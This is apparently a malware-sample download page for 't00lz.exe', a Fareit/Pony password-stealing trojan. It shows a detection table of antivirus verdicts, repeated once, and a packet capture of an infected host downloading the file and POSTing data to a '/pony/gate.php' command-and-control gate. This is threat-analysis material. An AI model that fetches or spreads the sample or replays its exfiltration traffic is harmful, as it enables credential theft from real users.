Download Attachments
-
1
t00lz
Date added: November 2, 2016 2:59 am
Added by: admin
File size: 4 KB
Downloads: 292
SHA256: |
09002c686e358799a9d732f4483a31a858bb140a3dfd59df54b1d449d2f8122b |
File name: |
t00lz.exe |
Detection ratio: |
50 / 55 |
Analysis date: |
2016-11-02 02:52:48 UTC ( 2 minutes ago ) |
Ad-Aware |
Gen:Variant.Razy.11684 |
20161102
Ad-Aware |
Gen:Variant.Razy.11684 |
20161102 |
AegisLab |
Troj.W32.Gen.lIb0 |
20161102 |
AhnLab-V3 |
Trojan/Win32.Tepfer.N2144687522 |
20161101 |
Antiy-AVL |
Trojan[:HEUR]/Win32.Unknown |
20161102 |
Arcabit |
Trojan.Razy.D2DA4 |
20161102 |
Avast |
Win32:Evo-gen [Susp] |
20161102 |
Avira (no cloud) |
TR/PSW.Fareit.iloen |
20161101 |
Baidu |
Win32.Trojan-PSW.Fareit.a |
20161101 |
BitDefender |
Gen:Variant.Razy.11684 |
20161102 |
CAT-QuickHeal |
PWS.Fareit.E3 |
20161101 |
ClamAV |
Win.Trojan.Fareit-403 |
20161101 |
Comodo |
TrojWare.Win32.PWS.Fareit.GS |
20161102 |
CrowdStrike Falcon (ML) |
malicious_confidence_98% (W) |
20161024 |
Cyren |
W32/Tepfer.R.gen!Eldorado |
20161102 |
DrWeb |
Trojan.PWS.Stealer.1932 |
20161102 |
ESET-NOD32 |
a variant of Win32/PSW.Fareit.A |
20161101 |
Emsisoft |
Gen:Variant.Razy.11684 (B) |
20161102 |
F-Prot |
W32/Tepfer.R.gen!Eldorado |
20161102 |
F-Secure |
Gen:Variant.Razy.11684 |
20161102 |
|
AegisLab |
Troj.W32.Gen.lIb0 |
20161102 |
AhnLab-V3 |
Trojan/Win32.Tepfer.N2144687522 |
20161101 |
Antiy-AVL |
Trojan[:HEUR]/Win32.Unknown |
20161102 |
Arcabit |
Trojan.Razy.D2DA4 |
20161102 |
Avast |
Win32:Evo-gen [Susp] |
20161102 |
Avira (no cloud) |
TR/PSW.Fareit.iloen |
20161101 |
Baidu |
Win32.Trojan-PSW.Fareit.a |
20161101 |
BitDefender |
Gen:Variant.Razy.11684 |
20161102 |
CAT-QuickHeal |
PWS.Fareit.E3 |
20161101 |
ClamAV |
Win.Trojan.Fareit-403 |
20161101 |
Comodo |
TrojWare.Win32.PWS.Fareit.GS |
20161102 |
CrowdStrike Falcon (ML) |
malicious_confidence_98% (W) |
20161024 |
Cyren |
W32/Tepfer.R.gen!Eldorado |
20161102 |
DrWeb |
Trojan.PWS.Stealer.1932 |
20161102 |
ESET-NOD32 |
a variant of Win32/PSW.Fareit.A |
20161101 |
Emsisoft |
Gen:Variant.Razy.11684 (B) |
20161102 |
F-Prot |
W32/Tepfer.R.gen!Eldorado |
20161102 |
F-Secure |
Gen:Variant.Razy.11684 |
20161102 |
2016-11-01 21:22:37.170895 IP 192.168.1.102.51077 > 216.34.181.96.80: Flags [P.], seq 0:298, ack 1, win 64240, length 298: HTTP: GET /pony/t00lz.exe HTTP/1.1
E..R.w@……..f.”.`…P,.J8….P…]i..GET /pony/t00lz.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: t00lz.sourceforge.net
Connection: Keep-Alive
2016-11-01 21:22:37.225484 IP 192.168.1.102.51077 > 216.34.181.96.80: Flags [.], ack 2921, win 64240, length 0
E..(.x@……..f.”.`…P,.Kb….P….Y……..
—
E..(..@……..f.”.`…PX3|F..lpP…M}……..
2016-11-01 21:22:45.130245 IP 192.168.1.102.51078 > 216.34.181.96.80: Flags [P.], seq 0:274, ack 1, win 64240, length 274: HTTP: POST /pony/gate.php HTTP/1.0
E..:..@……..f.”.`…PX3|F..lpP…@s..POST /pony/gate.php HTTP/1.0
Host: t00lz.sourceforge.net
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 338
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Please follow and like us:
[…] Original article: Razy/Fareit Variant Pony Trojan Downloader Malware FULL PCAP File Download Traffic Sample gate.php. […]